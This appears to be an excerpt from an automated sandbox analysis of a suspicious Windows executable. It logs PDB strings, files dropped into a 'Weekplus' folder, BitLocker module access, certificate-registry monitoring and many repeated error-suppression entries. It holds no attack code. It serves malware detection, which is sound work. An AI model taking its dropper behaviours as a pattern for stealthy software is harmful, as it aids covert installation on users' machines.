Source:	Binary string: \??\C:\Windows\symbols\exe\XMM556.pdb source: #U6c47#U8054#U652f#U4ed8.exe, 00000000.00000002.2636400963.0000000027560000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: c:\buildslave\steamvr_rel_hotfix_win64\build\src\vrdashboard\Retail\win64\2017\vrdashboard.pdbF%% source: GamePlusPlus.exe, 0000000A.00000000.2448572659.00007FF646EA2000.00000002.00000001.01000000.0000000C.sdmp, GamePlusPlus.exe, 0000000A.00000002.2495342880.00007FF646EA2000.00000002.00000001.01000000.0000000C.sdmp, GamePlusPlus.exe, 0000000B.00000002.2466184660.00007FF646EA2000.00000002.00000001.01000000.0000000C.sdmp, GamePlusPlus.exe, 0000000B.00000000.2453259450.00007FF646EA2000.00000002.00000001.01000000.0000000C.sdmp, GamePlusPlus.exe, 0000000C.00000002.2465406124.00007FF646EA2000.00000002.00000001.01000000.0000000C.sdmp, GamePlusPlus.exe, 0000000C.00000000.2454237429.00007FF646EA2000.00000002.00000001.01000000.0000000C.sdmp, GamePlusPlus.exe, 0000000D.00000000.2456740595.00007FF646EA2000.00000002.00000001.01000000.0000000C.sdmp, GamePlusPlus.exe, 0000000D.00000002.2466011324.00007FF646EA2000.00000002.00000001.01000000.0000000C.sdmp, GamePlusPlus.exe.0.dr
Source:	Binary string: System.Core.pdb source: WERA028.tmp.dmp.9.dr
Source:	Binary string: Microsoft.Management.Infrastructure.Native.pdb source: WERA028.tmp.dmp.9.dr
Source:	Binary string: C:\Users\Administrator\documents\visual studio 2010\Projects\XMM556\XMM556\obj\x64\Release\XMM556.pdb source: #U6c47#U8054#U652f#U4ed8.exe, 00000000.00000002.2630880406.0000000022BB8000.00000004.00000020.00020000.00000000.sdmp, #U6c47#U8054#U652f#U4ed8.exe, 00000000.00000002.2634863430.00000000274A2000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: Microsoft.Management.Infrastructure.Native.ni.pdbRSDS source: WERA028.tmp.dmp.9.dr
Source:	Binary string: System.Numerics.pdb source: WERA028.tmp.dmp.9.dr
Source:	Binary string: c:\buildslave\steam_rel_client_win64\build\src\steam_api\win64\Release\steam_api64.pdb source: GamePlusPlus.exe, 0000000A.00000002.2495583395.00007FFD9B1B8000.00000002.00000001.01000000.0000000D.sdmp, GamePlusPlus.exe, 0000000B.00000002.2466518264.00007FFD9B1B8000.00000002.00000001.01000000.0000000D.sdmp, GamePlusPlus.exe, 0000000C.00000002.2465879563.00007FFD9B1B8000.00000002.00000001.01000000.0000000D.sdmp, GamePlusPlus.exe, 0000000D.00000002.2466433531.00007FFD9B1B8000.00000002.00000001.01000000.0000000D.sdmp, steam_api64.dll.0.dr
Source:	Binary string: System.ni.pdb source: WERA028.tmp.dmp.9.dr
Source:	Binary string: System.Core.ni.pdbRSDS source: WERA028.tmp.dmp.9.dr

Source: C:\Program Files\Weekplus\GamePlusPlus.exe

10_2_00007FF646E84790

Source: openvr_api.dll.0.dr	Static PE information: section name: .fptable
Source: steam_api64.dll.0.dr	Static PE information: section name: _RDATA

Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Code function: 0_2_00007FFD3445D2A5 pushad ; iretd	0_2_00007FFD3445D2A6
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Code function: 0_2_00007FFD345700BD pushad ; iretd	0_2_00007FFD345700C1
Source: C:\Program Files\Weekplus\APP.exe	Code function: 3_2_00007FFD345578CB pushad ; iretd	3_2_00007FFD345578E1
Source: C:\Program Files\Weekplus\APP.exe	Code function: 3_2_00007FFD34551515 pushad ; retf	3_2_00007FFD3455159D

Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	File created: C:\Program Files\Weekplus\openvr_api.dll	Jump to dropped file
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	File created: C:\Program Files\Weekplus\APP.exe	Jump to dropped file
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	File created: C:\Program Files\Weekplus\steam_api64.dll	Jump to dropped file
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	File created: C:\Program Files\Weekplus\GamePlusPlus.exe	Jump to dropped file

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior

Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate			Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot			Jump to behavior

Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
